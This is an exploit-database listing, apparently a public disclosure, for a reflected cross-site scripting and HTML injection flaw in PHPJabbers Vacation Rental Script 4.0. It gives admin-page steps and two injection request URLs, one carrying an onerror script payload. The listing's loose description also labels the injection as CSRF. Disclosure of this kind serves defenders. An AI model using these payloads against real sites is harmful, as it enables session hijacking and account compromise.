Exploit for PHPJabbers Vacation Rental Script 4.0 Cross Site Request Forgery

Name: Exploit for PHPJabbers Vacation Rental Script 4.0 Cross Site Request Forgery
Rating: 5 (38 reviews)

2023-08-09 | CVSS 7.1

## https://sploitus.com/exploit?id=PACKETSTORM:174081
# Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF  
# Date: 05/08/2023  
# Exploit Author: Hasan Ali YILDIR  
# Vendor Homepage: https://www.phpjabbers.com/  
# Software Link: https://www.phpjabbers.com/vacation-rental-script/  
# Version: 4.0  
# Tested on: Windows 10 Pro  
  
## Description  
  
The attacker can send to victim a link containing a malicious URL in an email or instant message  
can perform a wide variety of actions, such as stealing the victim's session token or login credentials  
  
  
Technical Detail / POC  
  
==========================  
  
1. Login Account  
2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)  
3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21)  
  
  
[1] Cross-Site Request Forgery  
  
Request:  
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><font%20color="red">CSRF%20test</font>  
  
[2] Cross-Site Scripting (XSS)  
  
Request:  
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><image/src/onerror=prompt(8)>